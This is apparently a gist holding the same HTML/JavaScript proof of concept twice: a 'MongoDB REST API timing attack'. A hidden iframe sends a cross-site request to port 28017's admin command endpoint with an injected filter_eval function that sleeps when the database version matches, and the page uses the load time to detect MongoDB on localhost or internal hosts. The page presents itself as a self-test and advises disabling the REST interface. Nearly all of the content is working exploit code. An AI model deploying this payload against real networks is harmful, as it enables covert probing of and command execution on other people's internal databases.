/mongodb_rest_timing.html Secret

## mongodb_rest_timing.html
<html>

<head>
    <title>MongoDB REST API timing attack</title>
</head>

<body>
    <div>
        <h1>MongoDB REST API timing attack</h1>
        <p>Test if MongoDB's REST API exploitable through CSRF on your localhost or on a host in your internal network. This poses a security risk and you should deactivate it.</p>

        To check IP <input value = "127.0.0.1" id = "ip"> for version
        <select id = "version">
            <option value = "2">2</option>
            <option value = "3">3</option>
        </select>
        click on <button onclick = "check()">check</button>
    </div>
    <script>
        function check()
        {
            target_ip = document.getElementById('ip').value
            console.log(target_ip);
            version = document.getElementById('version').value
            first_date = Date.now()
            attack_iframe = document.createElement('iframe');
            document.body.appendChild(attack_iframe);
            attack_iframe.style = "visibility:hidden;";
            attack_iframe.onload = function(){
                second_date = Date.now()
                time = second_date-first_date;
                console.log(time)
                if(time > 2000)
                {
                    alert('Possible match.\nThere might be mongodb '+version+'.x on IP '+target_ip+'\nPlease consider to deactivate it as database commands can be issued even if it\'s just a testing environment.')
                }
                else
                {
                    alert('There is either no mongodb running on '+target_ip+',\nit wasn\'t started with --rest,\na different port is used\nor another problem occured')
                }
            }
            url = 'http://'+target_ip+':28017/admin/$cmd/?filter_eval=function(){if(db.version().charAt(0)=='+version+'){sleep(2000)}}&limit=1';
            console.log(url);
            attack_iframe.src=url;
        }
    </script>
</body>
</html>
	<html>

	<head>
	<title>MongoDB REST API timing attack</title>
	</head>

	<body>
	<div>
	<h1>MongoDB REST API timing attack</h1>
	<p>Test if MongoDB's REST API exploitable through CSRF on your localhost or on a host in your internal network. This poses a security risk and you should deactivate it.</p>

	To check IP <input value = "127.0.0.1" id = "ip"> for version
	<select id = "version">
	<option value = "2">2</option>
	<option value = "3">3</option>
	</select>
	click on <button onclick = "check()">check</button>
	</div>
	<script>
	function check()
	{
	target_ip = document.getElementById('ip').value
	console.log(target_ip);
	version = document.getElementById('version').value
	first_date = Date.now()
	attack_iframe = document.createElement('iframe');
	document.body.appendChild(attack_iframe);
	attack_iframe.style = "visibility:hidden;";
	attack_iframe.onload = function(){
	second_date = Date.now()
	time = second_date-first_date;
	console.log(time)
	if(time > 2000)
	{
	alert('Possible match.\nThere might be mongodb '+version+'.x on IP '+target_ip+'\nPlease consider to deactivate it as database commands can be issued even if it\'s just a testing environment.')
	}
	else
	{
	alert('There is either no mongodb running on '+target_ip+',\nit wasn\'t started with --rest,\na different port is used\nor another problem occured')
	}
	}
	url = 'http://'+target_ip+':28017/admin/$cmd/?filter_eval=function(){if(db.version().charAt(0)=='+version+'){sleep(2000)}}&limit=1';
	console.log(url);
	attack_iframe.src=url;
	}
	</script>
	</body>
	</html>
No results found